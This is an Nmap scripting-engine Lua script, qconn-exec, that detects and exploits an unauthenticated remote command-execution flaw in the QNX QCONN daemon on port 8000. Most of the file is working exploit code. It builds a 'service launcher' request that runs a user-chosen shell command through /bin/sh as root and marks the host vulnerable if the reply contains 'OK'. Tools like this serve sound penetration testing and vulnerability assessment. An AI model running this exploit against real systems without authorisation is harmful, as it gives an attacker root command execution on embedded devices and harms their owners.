local comm = require("comm") local vulns = require("vulns") local stdnse = require("stdnse") local shortport = require("shortport") description = [[ Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands. QNX is a commercial Unix-like real-time operating system, aimed primarily at the embedded systems market. The QCONN daemon is a service provider that provides support, such as profiling system information, to remote IDE components. The QCONN daemon runs on port 8000 by default. For more information about QNX QCONN, see: * http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html * http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos * http://www.exploit-db.com/exploits/21520 * http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec ]] --- -- @usage -- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p -- -- @output -- PORT STATE SERVICE VERSION -- 8000/tcp open qconn qconn remote IDE support -- | qconn-exec: -- | VULNERABLE: -- | The QNX QCONN daemon allows remote command execution. -- | State: VULNERABLE -- | Risk factor: High -- | Description: -- | The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating -- | system commands as the 'root' user. -- | -- | References: -- | http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos -- |_ http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec -- -- @args qconn-exec.timeout -- Set the timeout in seconds. The default value is 60. -- -- @args qconn-exec.bytes -- Set the number of bytes to retrieve. The default value is 1024. -- -- @args qconn-exec.cmd -- Set the operating system command to execute. The default value is "uname -a". -- -- @changelog -- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org -- 2013-07-28 - Revised - allow users to specify arbitrary commands -- - now uses the vuln library for reporting author = "Brendan Coles" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"intrusive", "exploit", "vuln"} portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"}) action = function( host, port ) local vuln_table = { title = "The QNX QCONN daemon allows remote command execution.", state = vulns.STATE.NOT_VULN, risk_factor = "High", description = [[ The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands as the 'root' user. ]], references = { 'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos', 'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec' } } -- Set socket timeout local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30) -- Set max bytes to retrieve local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024) -- Set command to execute local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a") -- Send command as service launcher request local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd) stdnse.print_debug(1, ("%s: Connecting to %s:%s"):format(SCRIPT_NAME, host.targetname or host.ip, port.number)) local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes}) if not status then stdnse.print_debug(1, ("%s: Timeout exceeded for %s:%s (Timeout: %ss)."):format(SCRIPT_NAME, host.targetname or host.ip, port.number, timeout)) return end -- Parse response stdnse.print_debug(2, ("%s: Received reply:\n%s"):format(SCRIPT_NAME, data)) if not string.match(data, "QCONN") then stdnse.print_debug(1, ("%s: %s:%s is not a QNX QCONN daemon."):format(SCRIPT_NAME, host.targetname or host.ip, port.number)) return end -- Check if the daemon attempted to execute the command if string.match(data, 'OK [0-9]+\r?\n') then vuln_table.state = vulns.STATE.VULN local report = vulns.Report:new(SCRIPT_NAME, host, port) return report:make_output(vuln_table) else stdnse.print_debug(1, ("%s: %s:%s QNX QCONN daemon is not vulnerable."):format(SCRIPT_NAME, host.targetname or host.ip, port.number)) return end end